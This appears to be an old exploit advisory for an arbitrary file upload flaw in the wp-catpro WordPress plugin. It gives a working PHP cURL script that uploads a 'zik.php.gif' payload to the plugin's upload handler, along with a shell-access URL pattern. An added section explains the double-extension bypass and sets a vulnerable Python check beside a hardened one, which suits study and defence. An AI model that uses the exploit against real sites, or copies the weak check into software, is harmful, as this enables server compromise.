WordPress plugin wp-catpro arbitrary file upload
Posted 2013-2-27 20:12:43
Wordpress plugins - wp-catpro Arbitrary File Upload Vulnerability
#-----------------------------------------------------------------------

Author => Zikou-16
Email => zikou16x@gmail.com
Tested on : Windows 7 , Backtrack 5r3
Download : http://xmlswf.com/images/stories/WP_plugins/wp-catpro.zip
####

#=> Exploit info:
------------------
# The attacker can upload file/shell.php.gif
# ("jpg", "gif", "png")  // Allowed file extensions
# "/uploads/";  // The path where we will save the file (getcwd() may not be reliable and should be tested in your environment)
# '.A-Z0-9_ !@#$%^&()+={}\[\]\',~`-'; // Characters allowed in the file name (in a Regular Expression format)
------------------

#=> Exploit
-----------
<?php
// Local file to upload: a PHP payload with a trailing image extension, so the
// handler's extension allow-list (jpg/gif/png) accepts it.
$uploadfile = "zik.php.gif";

// The SWFUpload upload handler shipped inside the plugin.
$ch = curl_init("http://[ www.2cto.com ]/[path]/wp-content/plugins/wp-catpro/js/swfupload/js/upload.php");
curl_setopt($ch, CURLOPT_POST, true);
// "@file" is the pre-PHP-5.5 cURL syntax for attaching a file to a POST field;
// on PHP 5.5 and later use new CURLFile($uploadfile) instead.
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => "@$uploadfile",
          'folder'   => '/wp-content/uploads/catpro/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);

// The handler's response contains the name the file was stored under.
print "$postResult";

// Shell Access : http://[ www.xxx.com ]/[path]/wp-content/uploads/catpro/random_name.php.gif
?>

<?php
// Contents of zik.php.gif, the payload that gets uploaded.
phpinfo();
?>
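The bypass above works because the upload handler compares only the last extension of the client-supplied name against its allow-list, and the stored file keeps that name, so a server whose PHP handler matches `.php` anywhere in the file name (the classic Apache `AddHandler application/x-httpd-php .php` setup) will execute `random_name.php.gif`. The following is an added example, not code from the advisory or from the wp-catpro plugin: it models the weak check with the allow-list and character class quoted in the advisory, models the handler rule that makes it exploitable, and puts a hardened check beside it. The magic-byte table, the sample file names and the `EXECUTABLE` set are assumptions constructed for the example.

```python
"""Double-extension upload bypass: vulnerable check vs. hardened check.

Added example, not the plugin's own code. The allow-list and the character
class come from the advisory text; everything else is constructed here.
"""
import os
import re
import secrets
from typing import Optional

ALLOWED = {"jpg", "gif", "png"}  # allow-list quoted in the advisory
# Character class quoted in the advisory (PHP's \' is a plain quote here).
VALID_CHARS = r".A-Z0-9_ !@#$%^&()+={}\[\]',~`-"

# Well-known leading bytes of the allowed image types (assumption: only these
# three types are accepted, as in the advisory's allow-list).
MAGIC = {
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
    "png": b"\x89PNG\r\n\x1a\n",
}
# Extensions a PHP handler would execute (constructed set for the example).
EXECUTABLE = {"php", "php3", "php4", "php5", "phtml", "phar"}


def vulnerable_check(filename: str) -> bool:
    """The weak pattern: strip disallowed characters, then compare only the
    LAST extension with the allow-list. 'shell.php.gif' ends in 'gif' and
    therefore passes."""
    cleaned = re.sub(r"[^" + VALID_CHARS + r"]|\.+$", "",
                     os.path.basename(filename), flags=re.I)
    ext = cleaned.rsplit(".", 1)[-1].lower() if "." in cleaned else ""
    return ext in ALLOWED


def apache_addhandler_runs_as_php(filename: str) -> bool:
    """Models why the stored file is a shell and not an image: with
    'AddHandler application/x-httpd-php .php', mod_mime treats every
    dot-separated segment as an extension, so 'x.php.gif' is handed to PHP."""
    segments = filename.lower().split(".")[1:]
    return any(seg in EXECUTABLE for seg in segments)


def hardened_check(filename: str, content: bytes) -> bool:
    """Accept only <name>.<allowed ext> with exactly one extension, and require
    the file's leading bytes to match the type the extension claims."""
    parts = os.path.basename(filename).split(".")
    if len(parts) != 2 or not parts[0]:
        return False
    ext = parts[1].lower()
    if ext not in ALLOWED:
        return False
    return content.startswith(MAGIC[ext])


def stored_name(filename: str, content: bytes) -> Optional[str]:
    """Never reuse the client's name: store under a random server-chosen name
    with a single allowed extension, or refuse the upload."""
    if not hardened_check(filename, content):
        return None
    ext = filename.rsplit(".", 1)[-1].lower()
    return f"{secrets.token_hex(8)}.{ext}"


if __name__ == "__main__":
    shell = b"<?php phpinfo(); ?>"          # constructed payload bytes
    gif = b"GIF89a" + b"\x00" * 16           # constructed minimal GIF header
    print("vulnerable accepts shell.php.gif:", vulnerable_check("shell.php.gif"))
    print("Apache would execute it:", apache_addhandler_runs_as_php("random_name.php.gif"))
    print("hardened accepts shell.php.gif:", hardened_check("shell.php.gif", shell))
    print("hardened stores photo.gif as:", stored_name("photo.gif", gif))
```

The hardened path does three independent things, and each alone closes a different variant of the bug: a single-extension rule defeats `shell.php.gif`, the magic-byte check defeats a PHP payload named `shell.gif`, and the server-generated name removes any influence the client had over what lands on disk. Serving the upload directory with PHP execution disabled (no handler mapping, or `php_flag engine off`) is the defence in depth that makes the `AddHandler` rule irrelevant even if the check is later broken again.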